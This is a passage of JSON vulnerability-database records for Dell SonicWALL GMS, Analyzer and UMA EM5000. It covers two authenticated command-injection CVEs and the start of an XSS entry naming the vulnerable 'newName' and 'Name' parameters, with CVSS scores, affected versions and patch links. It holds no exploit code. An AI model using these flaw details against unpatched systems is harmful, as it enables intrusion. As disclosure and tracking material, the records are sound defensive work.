"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-3990",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "CVE-2015-3990",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201505-424",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-81951",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-15-231"
},
{
"db": "VULHUB",
"id": "VHN-81951"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002771"
},
{
"db": "NVD",
"id": "CVE-2015-3990"
},
{
"db": "CNNVD",
"id": "CNNVD-201505-424"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The GMS ViewPoint (GMSVP) web application in Dell Sonicwall GMS, Analyzer, and UMA EM5000 before 7.2 SP4 allows remote authenticated users to execute arbitrary commands via vectors related to configuration. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. Authentication is required to exploit this vulnerability.The specific flaw exists within the GMS ViewPoint (GMSVP) web application. The issue lies in the handling of configuration input due to a failure to safely sanitize user data before executing a command. An attacker could leverage this vulnerability to execute code with root privileges on the underlying operating system. Multiple Dell SonicWALL Products are prone to a remote code-execution vulnerability. Successful exploitation can completely compromise the vulnerable device. GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA EM5000 is a set of general management equipment software. The following products and versions are affected: Dell Sonicwall GMS 7.2 SP3 and earlier, Analyzer 7.2 SP3 and earlier, UMA EM5000 7.2 SP3 and earlier",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-3990"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002771"
},
{
"db": "ZDI",
"id": "ZDI-15-231"
},
{
"db": "BID",
"id": "74756"
},
{
"db": "VULHUB",
"id": "VHN-81951"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-3990",
"trust": 3.5
},
{
"db": "ZDI",
"id": "ZDI-15-231",
"trust": 3.2
},
{
"db": "BID",
"id": "74756",
"trust": 1.4
},
{
"db": "SECTRACK",
"id": "1032373",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002771",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-2659",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201505-424",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-81951",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-15-231"
},
{
"db": "VULHUB",
"id": "VHN-81951"
},
{
"db": "BID",
"id": "74756"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002771"
},
{
"db": "NVD",
"id": "CVE-2015-3990"
},
{
"db": "CNNVD",
"id": "CNNVD-201505-424"
}
]
},
"id": "VAR-201505-0258",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-81951"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T14:01:50.612000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GMS/Analyzer/UMA Remote Code Execution, XXE, and Host Header Injection Vulnerabilities Resolution - May 2015",
"trust": 0.8,
"url": "https://support.software.dell.com/product-notification/152178"
},
{
"title": "SonicWALL has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://support.software.dell.com/product-notification/152178?productname=sonicwall%20gms"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-15-231"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002771"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-19",
"trust": 1.1
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-81951"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002771"
},
{
"db": "NVD",
"id": "CVE-2015-3990"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.zerodayinitiative.com/advisories/zdi-15-231/"
},
{
"trust": 1.7,
"url": "https://support.software.dell.com/product-notification/152178"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/74756"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1032373"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3990"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3990"
},
{
"trust": 0.7,
"url": "https://support.software.dell.com/product-notification/152178?productname=sonicwall%20gms"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-15-231"
},
{
"db": "VULHUB",
"id": "VHN-81951"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002771"
},
{
"db": "NVD",
"id": "CVE-2015-3990"
},
{
"db": "CNNVD",
"id": "CNNVD-201505-424"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-15-231"
},
{
"db": "VULHUB",
"id": "VHN-81951"
},
{
"db": "BID",
"id": "74756"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002771"
},
{
"db": "NVD",
"id": "CVE-2015-3990"
},
{
"db": "CNNVD",
"id": "CNNVD-201505-424"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-05-15T00:00:00",
"db": "ZDI",
"id": "ZDI-15-231"
},
{
"date": "2015-05-20T00:00:00",
"db": "VULHUB",
"id": "VHN-81951"
},
{
"date": "2015-05-21T00:00:00",
"db": "BID",
"id": "74756"
},
{
"date": "2015-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-002771"
},
{
"date": "2015-05-20T18:59:05.793000",
"db": "NVD",
"id": "CVE-2015-3990"
},
{
"date": "2015-05-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201505-424"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-05-15T00:00:00",
"db": "ZDI",
"id": "ZDI-15-231"
},
{
"date": "2018-03-13T00:00:00",
"db": "VULHUB",
"id": "VHN-81951"
},
{
"date": "2015-05-21T00:00:00",
"db": "BID",
"id": "74756"
},
{
"date": "2015-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-002771"
},
{
"date": "2023-11-07T02:25:44.987000",
"db": "NVD",
"id": "CVE-2015-3990"
},
{
"date": "2015-05-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201505-424"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201505-424"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Dell SonicWALL Product GMS ViewPoint Web An arbitrary command execution vulnerability in the application",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-002771"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "74756"
}
],
"trust": 0.3
}
}
var-201602-0122
Vulnerability from variot
The GMS ViewPoint (GMSVP) web application in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote authenticated users to execute arbitrary commands via vectors related to configuration input. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. Authentication is required to exploit this vulnerability.The specific flaw exists within the GMS ViewPoint (GMSVP) web application. The issue lies in the handling of configuration input due to a failure to safely sanitize user data before executing a command. An attacker could leverage this vulnerability to execute code with root privileges on the underlying operating system. Dell SonicWALL GMS (Global Management System), Analyzer and UMA EM5000 are all products of Dell (Dell). GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA EM5000 is a set of general management equipment software. The following products and versions are affected: Dell SonicWALL GMS, Analyzer, UMA EM5000 version 7.2, version 8.0, version 8.1 before Hotfix 168056
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201602-0122",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "global management system",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "8.0"
},
{
"model": "uma em5000",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "8.0"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "uma em5000",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "8.1"
},
{
"model": "analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "8.0"
},
{
"model": "analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "uma em5000",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "8.1"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "8.1"
},
{
"model": "sonicwall analyzer",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "7.2"
},
{
"model": "sonicwall analyzer",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "8.0"
},
{
"model": "sonicwall analyzer",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "8.1"
},
{
"model": "sonicwall global management system",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "7.2"
},
{
"model": "sonicwall global management system",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "8.0"
},
{
"model": "sonicwall global management system",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "8.1"
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": null,
"trust": 0.8,
"vendor": "dell",
"version": null
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "7.2"
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "8.0"
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "8.1"
},
{
"model": "gms virtual appliance",
"scope": null,
"trust": 0.7,
"vendor": "sonicwall",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-16-164"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001558"
},
{
"db": "NVD",
"id": "CVE-2016-2396"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-322"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:sonicwall:uma_em5000_firmware:7.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:sonicwall:uma_em5000_firmware:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:sonicwall:uma_em5000_firmware:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sonicwall:uma_em5000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2396"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "kernelsmith - Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-16-164"
}
],
"trust": 0.7
},
"cve": "CVE-2016-2396",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2016-2396",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 1.6,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-91215",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.1,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-2396",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2016-2396",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2016-2396",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201602-322",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-91215",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-2396",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-16-164"
},
{
"db": "VULHUB",
"id": "VHN-91215"
},
{
"db": "VULMON",
"id": "CVE-2016-2396"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001558"
},
{
"db": "NVD",
"id": "CVE-2016-2396"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-322"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The GMS ViewPoint (GMSVP) web application in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote authenticated users to execute arbitrary commands via vectors related to configuration input. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. Authentication is required to exploit this vulnerability.The specific flaw exists within the GMS ViewPoint (GMSVP) web application. The issue lies in the handling of configuration input due to a failure to safely sanitize user data before executing a command. An attacker could leverage this vulnerability to execute code with root privileges on the underlying operating system. Dell SonicWALL GMS (Global Management System), Analyzer and UMA EM5000 are all products of Dell (Dell). GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA EM5000 is a set of general management equipment software. The following products and versions are affected: Dell SonicWALL GMS, Analyzer, UMA EM5000 version 7.2, version 8.0, version 8.1 before Hotfix 168056",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2396"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001558"
},
{
"db": "ZDI",
"id": "ZDI-16-164"
},
{
"db": "VULHUB",
"id": "VHN-91215"
},
{
"db": "VULMON",
"id": "CVE-2016-2396"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-2396",
"trust": 3.3
},
{
"db": "ZDI",
"id": "ZDI-16-164",
"trust": 3.3
},
{
"db": "SECTRACK",
"id": "1035015",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001558",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-3037",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201602-322",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-91215",
"trust": 0.1
},
{
"db": "BID",
"id": "83200",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-2396",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-16-164"
},
{
"db": "VULHUB",
"id": "VHN-91215"
},
{
"db": "VULMON",
"id": "CVE-2016-2396"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001558"
},
{
"db": "NVD",
"id": "CVE-2016-2396"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-322"
}
]
},
"id": "VAR-201602-0122",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-91215"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:06:14.989000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SonicWALL Analyzer Product Notification",
"trust": 0.8,
"url": "https://support.software.dell.com/product-notification/185943"
},
{
"title": "SonicWALL has issued an update to correct this vulnerability. Hotfix 168056",
"trust": 0.7,
"url": "https://www.mysonicwall.com/firmware/downloadcenter.aspx"
},
{
"title": "Multiple Dell Product Any Command Execution Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60258"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-16-164"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001558"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-322"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.1
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-91215"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001558"
},
{
"db": "NVD",
"id": "CVE-2016-2396"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://www.zerodayinitiative.com/advisories/zdi-16-164"
},
{
"trust": 1.8,
"url": "https://support.software.dell.com/product-notification/185943"
},
{
"trust": 1.2,
"url": "http://www.securitytracker.com/id/1035015"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2396"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2396"
},
{
"trust": 0.7,
"url": "https://www.mysonicwall.com/firmware/downloadcenter.aspx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/77.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/83200"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-16-164"
},
{
"db": "VULHUB",
"id": "VHN-91215"
},
{
"db": "VULMON",
"id": "CVE-2016-2396"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001558"
},
{
"db": "NVD",
"id": "CVE-2016-2396"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-322"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-16-164"
},
{
"db": "VULHUB",
"id": "VHN-91215"
},
{
"db": "VULMON",
"id": "CVE-2016-2396"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001558"
},
{
"db": "NVD",
"id": "CVE-2016-2396"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-322"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-02-10T00:00:00",
"db": "ZDI",
"id": "ZDI-16-164"
},
{
"date": "2016-02-17T00:00:00",
"db": "VULHUB",
"id": "VHN-91215"
},
{
"date": "2016-02-17T00:00:00",
"db": "VULMON",
"id": "CVE-2016-2396"
},
{
"date": "2016-03-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001558"
},
{
"date": "2016-02-17T15:59:06.737000",
"db": "NVD",
"id": "CVE-2016-2396"
},
{
"date": "2016-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-322"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-02-10T00:00:00",
"db": "ZDI",
"id": "ZDI-16-164"
},
{
"date": "2018-03-12T00:00:00",
"db": "VULHUB",
"id": "VHN-91215"
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2016-2396"
},
{
"date": "2016-03-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001558"
},
{
"date": "2023-11-07T02:31:10.550000",
"db": "NVD",
"id": "CVE-2016-2396"
},
{
"date": "2016-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-322"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-322"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Dell SonicWALL Product GMS ViewPoint Web An arbitrary command execution vulnerability in the application",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001558"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-322"
}
],
"trust": 0.6
}
}
var-201801-1670
Vulnerability from variot
SonicWall Global Management System (GMS) 8.1 has XSS via the newName and Name values of the /sgms/TreeControl module. The system enables rapid deployment and centralized management of Dell SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. A remote attacker can use the 'newName' and 'Name' values in the /sgms/TreeControl module to exploit this vulnerability to inject malicious script code into the web application of the SonicWall GMS device
{
"@context": {
